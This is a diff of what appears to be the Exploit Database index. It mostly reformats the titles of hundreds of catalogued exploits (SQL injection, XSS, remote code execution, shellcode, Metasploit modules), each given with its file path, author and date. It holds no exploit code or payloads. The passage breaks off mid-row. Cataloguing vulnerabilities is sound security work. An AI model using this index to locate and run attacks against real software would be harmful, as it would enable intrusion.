38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 38630,platforms/php/webapps/38630.html,"phpVibe - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0 -38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 TrueType tt_cmap14_validate Parsing Heap-Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 +38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap-Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 38621,platforms/php/webapps/38621.txt,"WordPress Xorbin Digital Flash Clock Plugin - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 -38622,platforms/linux/dos/38622.txt,"libvirt 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0 -38623,platforms/multiple/dos/38623.html,"RealNetworks RealPlayer Denial of Service",2013-07-02,"Akshaysinh Vaghela",multiple,dos,0 +38622,platforms/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0 +38623,platforms/multiple/dos/38623.html,"RealNetworks RealPlayer - Denial of Service",2013-07-02,"Akshaysinh Vaghela",multiple,dos,0 38624,platforms/php/webapps/38624.txt,"WordPress WP Feed Plugin - 'nid' Parameter SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 38625,platforms/php/webapps/38625.txt,"WordPress Category Grid View Gallery Plugin - 'ID' Parameter Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,multiple,dos,0 -38627,platforms/android/remote/38627.sh,"Google Android 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 +38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 38628,platforms/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0 -38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Remote Code Execution Exploit (Pre-Auth) (0Day)",2015-11-05,hhjj,php,webapps,0 +38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Pre-Auth Remote Code Execution Exploit (0Day)",2015-11-05,hhjj,php,webapps,0 38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0 38634,platforms/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Vallidation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0 38635,platforms/php/webapps/38635.txt,"iVote - 'details.php' SQL Injection",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0 38636,platforms/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",multiple,remote,0 38637,platforms/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",multiple,remote,0 -38638,platforms/php/webapps/38638.txt,"Mintboard Multiple Cross-Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0 +38638,platforms/php/webapps/38638.txt,"Mintboard - Multiple Cross-Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0 38639,platforms/php/webapps/38639.txt,"miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0 -38640,platforms/multiple/webapps/38640.rb,"OpenSSL Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0 +38640,platforms/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 @@ -34926,20 +34921,20 @@ id,file,description,date,author,platform,type,port 38653,platforms/asp/webapps/38653.txt,"Corda Highwire - 'Highwire.ashx' File Path Disclosure",2013-07-12,"Adam Willard",asp,webapps,0 38654,platforms/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' Parameter HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector - 'redirector.corda' Cross-Site Scripting",2013-07-12,"Adam Willard",asp,webapps,0 -38656,platforms/php/webapps/38656.html,"PrestaShop Multiple Cross-Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0 +38656,platforms/php/webapps/38656.html,"PrestaShop - Multiple Cross-Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Stored XSS",2015-11-09,Nu11By73,hardware,webapps,0 39374,platforms/osx/dos/39374.c,"OS X Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0 38660,platforms/php/remote/38660.rb,"WordPress Ajax Load More 2.8.1.1 Plugin - PHP Upload",2015-11-09,Metasploit,php,remote,0 38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - CSRF",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0 -38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 +38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0 38664,platforms/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps,0 38665,platforms/php/webapps/38665.txt,"YESWIKI 0.2 - Path Traversal",2015-11-10,HaHwul,php,webapps,0 38666,platforms/multiple/remote/38666.txt,"Apache Struts 2.2.3 - Multiple Open Redirection Vulnerabilities",2013-07-16,"Takeshi Terada",multiple,remote,0 -38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow",2013-07-15,"Zachary Cutlip",windows,remote,0 -38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0 -38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution",2013-06-04,"SCRT Security",multiple,remote,0 +38667,platforms/windows/remote/38667.py,"ReadyMedia - Remote Heap Buffer Overflow",2013-07-15,"Zachary Cutlip",windows,remote,0 +38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption - Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0 +38669,platforms/multiple/remote/38669.txt,"MongoDB - 'conn' Mongo Object Remote Code Execution",2013-06-04,"SCRT Security",multiple,remote,0 38684,platforms/php/webapps/38684.txt,"R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities",2015-11-12,LiquidWorm,php,webapps,0 38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0 38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 @@ -34950,12 +34945,12 @@ id,file,description,date,author,platform,type,port 38677,platforms/php/webapps/38677.txt,"VBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 -38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 +38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module - Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 38682,platforms/php/webapps/38682.txt,"Jahia xCM - /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 38683,platforms/php/webapps/38683.txt,"Jahia xCM - /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0 -38824,platforms/hardware/remote/38824.html,"Fortinet FortiAnalyzer Cross-Site Request Forgery",2013-10-12,"William Costa",hardware,remote,0 +38824,platforms/hardware/remote/38824.html,"Fortinet FortiAnalyzer - Cross-Site Request Forgery",2013-10-12,"William Costa",hardware,remote,0 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0 38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 38689,platforms/php/webapps/38689.txt,"SilverStripe - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 @@ -34977,7 +34972,7 @@ id,file,description,date,author,platform,type,port 38706,platforms/multiple/webapps/38706.txt,"VLC Web Interface 2.2.1 - Metadata Title XSS",2015-11-16,"Andrea Sindoni",multiple,webapps,0 38707,platforms/hardware/webapps/38707.txt,"D-link Wireless Router DIR-816L - CSRF",2015-11-16,"Bhadresh Patel",hardware,webapps,0 38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - egghunter shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0 -38709,platforms/php/webapps/38709.txt,"MCImageManager Multiple Security Vulnerabilities",2013-07-16,MustLive,php,webapps,0 +38709,platforms/php/webapps/38709.txt,"MCImageManager - Multiple Security Vulnerabilities",2013-07-16,MustLive,php,webapps,0 38710,platforms/windows/dos/38710.py,"foobar2000 1.3.9 - (.pls; .m3u; .m3u8) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0 38711,platforms/windows/dos/38711.py,"foobar2000 1.3.9 - (.asx) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0 38712,platforms/php/webapps/38712.txt,"Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection",2013-08-20,"Ashiyane Digital Security Team",php,webapps,0 @@ -35007,14 +35002,14 @@ id,file,description,date,author,platform,type,port 38736,platforms/windows/dos/38736.txt,"Kaspersky Antivirus - ZIP File Format Use-After-Free",2015-11-16,"Google Security Research",windows,dos,0 38737,platforms/php/webapps/38737.txt,"Twilight CMS - DeWeS Web Server Directory Traversal",2013-08-21,"High-Tech Bridge",php,webapps,0 38738,platforms/python/webapps/38738.txt,"Plone - 'in_portal.py' <= 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",python,webapps,0 -38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0 +38739,platforms/java/webapps/38739.txt,"SearchBlox - Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",php,webapps,0 38741,platforms/linux/remote/38741.txt,"Nmap - Arbitrary File Write",2013-08-06,"Piotr Duszynski",linux,remote,0 -38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",windows,remote,0 +38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite - Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",windows,remote,0 38744,platforms/php/webapps/38744.txt,"appRain CMF - Multiple Cross-Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0 38745,platforms/php/webapps/38745.txt,"Xibo - 'layout' Parameter HTML Injection",2013-08-21,"Jacob Holcomb",php,webapps,0 38746,platforms/php/webapps/38746.html,"Xibo - Cross-Site Request Forgery",2013-08-21,"Jacob Holcomb",php,webapps,0 -38747,platforms/windows/dos/38747.py,"Pwstore Denial of Service",2013-04-16,"Josep Pi Rodriguez",windows,dos,0 +38747,platforms/windows/dos/38747.py,"Pwstore - Denial of Service",2013-04-16,"Josep Pi Rodriguez",windows,dos,0 38748,platforms/php/webapps/38748.txt,"dBlog CMS - 'm' Parameter SQL Injection",2013-09-03,ACC3SS,php,webapps,0 38749,platforms/asp/webapps/38749.txt,"Flo CMS - 'archivem' Parameter SQL Injection",2013-09-03,ACC3SS,asp,webapps,0 38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 @@ -35033,7 +35028,7 @@ id,file,description,date,author,platform,type,port 38763,platforms/lin_x86/dos/38763.txt,"Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 38764,platforms/hardware/remote/38764.rb,"F5 iControl - iCall::Script Root Command Execution",2015-11-19,Metasploit,hardware,remote,443 38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - CSRF",2015-11-19,"High-Tech Bridge SA",php,webapps,80 -38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 +38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 38767,platforms/php/webapps/38767.txt,"WordPress RokIntroScroller Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 38768,platforms/php/webapps/38768.txt,"WordPress RokMicroNews Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 38769,platforms/php/webapps/38769.txt,"Monstra CMS - 'login' Parameter SQL Injection",2013-09-20,linc0ln.dll,php,webapps,0 @@ -35048,7 +35043,7 @@ id,file,description,date,author,platform,type,port 38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial Of Service",2013-09-23,anonymous,linux,dos,0 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0 -38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 +38780,platforms/php/webapps/38780.txt,"SilverStripe - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 38783,platforms/php/webapps/38783.php,"WordPress Woopra Analytics Plugin - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0 38784,platforms/php/webapps/38784.txt,"AlienVault Open Source SIEM (OSSIM) - 'timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0 38785,platforms/php/webapps/38785.pl,"vBulletin 4.1.x - '/install/upgrade.php' Security Bypass",2013-10-13,"Joshua Rogers",php,webapps,0 @@ -35064,21 +35059,21 @@ id,file,description,date,author,platform,type,port 38795,platforms/windows/dos/38795.txt,"Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38796,platforms/windows/dos/38796.txt,"Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38797,platforms/php/remote/38797.rb,"Joomla Content History - SQLi / Remote Code Execution",2015-11-23,Metasploit,php,remote,80 -38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 +38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 38799,platforms/php/webapps/38799.txt,"BilboPlanet - 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",php,webapps,0 38800,platforms/php/webapps/38800.txt,"FreeSMS - pages/crc_handler.php scheduleid Parameter SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0 38801,platforms/php/webapps/38801.txt,"FreeSMS - pages/crc_handler.php Multiple Parameter XSS",2013-09-27,"Sarahma Security",php,webapps,0 38802,platforms/multiple/remote/38802.txt,"Oracle Glassfish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0 38804,platforms/hardware/remote/38804.py,"Multiple Level One Enterprise Access Point Devices - 'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",hardware,remote,0 -38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0 +38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0 38806,platforms/cgi/webapps/38806.txt,"Bugzilla - 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0 -38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 Tabular Reports Unspecified XSS",2013-10-09,"Mateusz Goik",cgi,webapps,0 +38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Unspecified XSS",2013-10-09,"Mateusz Goik",cgi,webapps,0 38808,platforms/php/webapps/38808.txt,"WordPress WP-Realty Plugin - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 38809,platforms/php/remote/38809.php,"PHP Point Of Sale - 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,php,remote,0 38810,platforms/hardware/remote/38810.py,"Multiple Vendors - 'RuntimeDiagnosticPing()' Stack Buffer Overflow",2013-10-14,"Craig Heffner",hardware,remote,0 38811,platforms/php/webapps/38811.txt,"WordPress Daily Deal Theme - Arbitrary Shell Upload",2013-10-23,DevilScreaM,php,webapps,0 -38812,platforms/multiple/remote/38812.txt,"DELL Quest One Password Manager CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",multiple,remote,0 -38813,platforms/multiple/remote/38813.txt,"Apache Shindig XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",multiple,remote,0 +38812,platforms/multiple/remote/38812.txt,"DELL Quest One Password Manager - CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",multiple,remote,0 +38813,platforms/multiple/remote/38813.txt,"Apache Shindig - XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",multiple,remote,0 38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component - 'name' Parameter Arbitrary Shell Upload",2013-10-20,SultanHaikal,php,webapps,0 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - Polymorphic execve Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0 38816,platforms/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0 @@ -35089,7 +35084,7 @@ id,file,description,date,author,platform,type,port 38821,platforms/android/remote/38821.py,"Google Android Signature Verification Security Bypass",2013-11-04,"Jay Freeman",android,remote,0 38822,platforms/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,windows,webapps,8080 38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2 / 0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 -38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence XML External Entity Information Disclosure",2013-10-11,IBM,multiple,remote,0 +38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence - XML External Entity Information Disclosure",2013-10-11,IBM,multiple,remote,0 38826,platforms/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 38827,platforms/php/remote/38827.txt,"Nagios XI - 'tfPassword' Parameter SQL Injection",2013-12-13,"Denis Andzakovic",php,remote,0 38828,platforms/php/webapps/38828.php,"Limonade framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",php,webapps,0 @@ -35106,13 +35101,13 @@ id,file,description,date,author,platform,type,port 38836,platforms/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0 38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent XSS",2015-12-01,"Mehdi Alouache",php,webapps,0 38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 -38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 -38846,platforms/multiple/remote/38846.txt,"nginx 1.1.17 URI Processing Security Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 +38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 +38846,platforms/multiple/remote/38846.txt,"nginx 1.1.17 - URI Processing Security Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0 38848,platforms/php/webapps/38848.php,"WordPress Suco Themes - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0 38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,Metasploit,cgi,remote,0 -38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 -38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 +38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 +38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 38852,platforms/php/webapps/38852.pl,"phpThumb - 'phpThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps,0 38853,platforms/hardware/remote/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,remote,0 38854,platforms/linux/dos/38854.sh,"Net-SNMP SNMPD AgentX Subagent Timeout Denial of Service",2012-09-05,"Ken Farnen",linux,dos,0 @@ -35132,7 +35127,7 @@ id,file,description,date,author,platform,type,port 38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin - 'jobid' Parameter SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 -38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0 +38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,windows,local,0 38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin - 'bwbps-uploader.php' Arbitrary File Upload",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0 38873,platforms/php/webapps/38873.txt,"eduTrac - 'showmask' Parameter Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps,0 38874,platforms/php/webapps/38874.txt,"BoastMachine - 'blog' Parameter SQL Injection",2013-12-13,"Omar Kurt",php,webapps,0 @@ -35143,7 +35138,7 @@ id,file,description,date,author,platform,type,port 38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator - Multiple SQL Injection",2013-12-14,R3d-D3V!L,asp,webapps,0 38880,platforms/php/webapps/38880.txt,"Veno File Manager - 'q' Parameter Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 38881,platforms/php/webapps/38881.html,"Piwigo - admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0 -38882,platforms/cgi/webapps/38882.txt,"Icinga cgi/config.c process_cgivars Function Off-by-one Read Remote DoS",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 +38882,platforms/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-one Read Remote DoS",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder - (QuickWeb) 1.0 apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - login.asp Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - /checktransferstatus.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0 @@ -35164,9 +35159,9 @@ id,file,description,date,author,platform,type,port 38902,platforms/php/webapps/38902.txt,"WordPress Polls Widget Plugin 1.0.7 - SQL Injection",2015-12-08,WICS,php,webapps,80 38903,platforms/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 38904,platforms/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 -38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin Velocity Template Injection",2015-12-08,Metasploit,multiple,remote,8080 +38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection",2015-12-08,Metasploit,multiple,remote,8080 38906,platforms/php/webapps/38906.txt,"dotCMS 3.2.4 - Multiple Vulnerabilities",2015-12-08,LiquidWorm,php,webapps,80 -38907,platforms/php/webapps/38907.txt,"Osclass Multiple Input Validation Vulnerabilities",2013-12-14,R3d-D3V!L,php,webapps,0 +38907,platforms/php/webapps/38907.txt,"Osclass - Multiple Input Validation Vulnerabilities",2013-12-14,R3d-D3V!L,php,webapps,0 38908,platforms/php/webapps/38908.txt,"Leed - 'id' Parameter SQL Injection",2013-12-18,"Alexandre Herzog",php,webapps,0 38909,platforms/linux/dos/38909.txt,"DenyHosts - 'regex.py' Remote Denial of Service",2013-12-19,"Helmut Grohne",linux,dos,0 38910,platforms/windows/remote/38910.txt,"Hancom Office - '.hml' File Processing Heap Buffer Overflow",2013-12-19,diroverflow,windows,remote,0 @@ -35175,31 +35170,31 @@ id,file,description,date,author,platform,type,port 38913,platforms/hardware/webapps/38913.txt,"WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 38914,platforms/hardware/webapps/38914.txt,"WIMAX MT711x - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 38915,platforms/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - XSS / CSRF",2015-12-09,Mysticism,php,webapps,80 -38916,platforms/windows/dos/38916.html,"IE 11.0.9600.18097 COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 +38916,platforms/windows/dos/38916.html,"IE 11.0.9600.18097 - 